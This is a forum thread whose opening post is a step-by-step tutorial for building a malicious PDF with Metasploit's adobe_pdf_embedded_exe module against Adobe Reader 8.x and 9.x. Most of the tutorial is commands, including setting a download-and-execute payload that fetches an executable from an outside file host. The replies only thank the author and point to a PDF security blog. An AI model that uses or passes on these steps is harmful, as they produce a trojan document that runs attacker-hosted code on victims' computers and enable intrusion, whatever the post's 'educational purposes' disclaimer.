Results 1 to 4 of 4

Thread: PDF fileformat exploit ( Tutorial )

  1. #1
    Member
    Join Date
    Mar 2010
    Location
    SO CAL
    Posts
    59

    Default PDF fileformat exploit ( Tutorial )

    Hello everyone haven't been here in a while just wanted to say whats up to everyone and the mods.
    Before i start i have a question for the mods why have you disabled most of my privileges??


    This tutorial is for educational purposes only and nothing more. By the way if you try to use this exploit good luck its picked up by all major AV vendors.


    More File Format exploit tutorial here Enc0de's blog: File Format tutorial exploits (PDF/Office)

    This tutorial with pictures here Enc0de's blog: Adobe PDF Embedded EXE (Adobe Reader v8.x, v9.x)



    ====Lets get started====


    The exploit i will be using in this tutorial will only affect Adobe Reader v8.x, v9.x (Windows XP SP3 English).


    First you need an exe file you wish to link to the PDF exploit I will be using calc.exe you can anything you like. Now once you figured out what file you want the PDF exploit to download execute go ahead and upload it to ripway. After all that is doen and ready start up Metasploit.


    I always recommend running an update first.

    Code:
    svn up
    Once the update is completed run this to pick the exploit.

    Code:
    use exploit/windows/fileformat/adobe_pdf_embedded_exe

    Now once we have launched the correct exploit lets run show options to see what it requires from us in order to generate a the PDF.

    Code:
    show options

    Now from looking at the picture we see we need to input a PDF file so go ahead and download what ever one you would like. Once you get the PDF file you want to insert please keep it on your /root/ directory to keep it simple.

    Now I found one that I want to use to I will place it on my desktop and name it IN.pdf . Now once its on the desktop lets insert the correct location of the PDF in metasploit.

    [ set INFILENAME /root/IN.pdf ]


    Ok now we need to pick a payload and the one we are going to be using is the download execute payload.

    Code:
    set payload windows/download_exec
    
    show options

    Ok you see the highlighted part in the white this was added from inserting the payload download execute. Now I hope you have uploaded the file you want the PDF to download execute if not go ahead and do so.

    Once you get the link we insert it like this.

    hxxp://h1.ripway.com/Hrevolution/calc.exe

    Code:
    set url hxxp://h1.ripway.com/Hrevolution/calc.exe
    Then all you need to do is just type exploit

    Code:
    exploit
    Stand up and be counted as a linux user.

  2. #2
    Good friend of the forums scottm99's Avatar
    Join Date
    Feb 2010
    Location
    underwater
    Posts
    371

    Default Re: PDF fileformat exploit ( Tutorial )

    I haven't done much with PDF exploits in metasploit lately, so this tutorial will be just the thing to refresh my memory. Thanks
    If I could figure out how to scuba dive & hack at the same time, there would be nothing I couldn't do...

  3. #3
    My life is this forum thorin's Avatar
    Join Date
    Jan 2010
    Posts
    2,629

    Default Re: PDF fileformat exploit ( Tutorial )

    For anyone else digging or re-digging into this like scottm99 you might wanna check out Didier Stevens' blog he's got lots of great PDF stuff:
    http://blog.didierstevens.com/
    I'm a compulsive post editor, you might wanna wait until my post has been online for 5-10 mins before quoting it as it will likely change.

    I know I seem harsh in some of my replies. SORRY! But if you're doing something illegal or posting something that seems to be obvious BS I'm going to call you on it.

  4. #4
    Good friend of the forums scottm99's Avatar
    Join Date
    Feb 2010
    Location
    underwater
    Posts
    371

    Default Re: PDF fileformat exploit ( Tutorial )

    Appreciate the link, thorin There's some good stuff on his blog.
    If I could figure out how to scuba dive & hack at the same time, there would be nothing I couldn't do...

Similar Threads

  1. SET - Troubles with SpearPhishing / FileFormat Payload
    By OLEO34 in forum BackTrack 5 General Topics
    Replies: 0
    Last Post: 07-12-2011, 01:38 AM
  2. Exploit-db quick navigation tutorial
    By Lincoln in forum BackTrack Howtos
    Replies: 2
    Last Post: 03-17-2011, 01:46 PM
  3. Replies: 1
    Last Post: 06-25-2010, 02:49 AM
  4. Replies: 3
    Last Post: 04-08-2010, 01:15 PM
  5. Replies: 1
    Last Post: 10-06-2007, 09:38 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •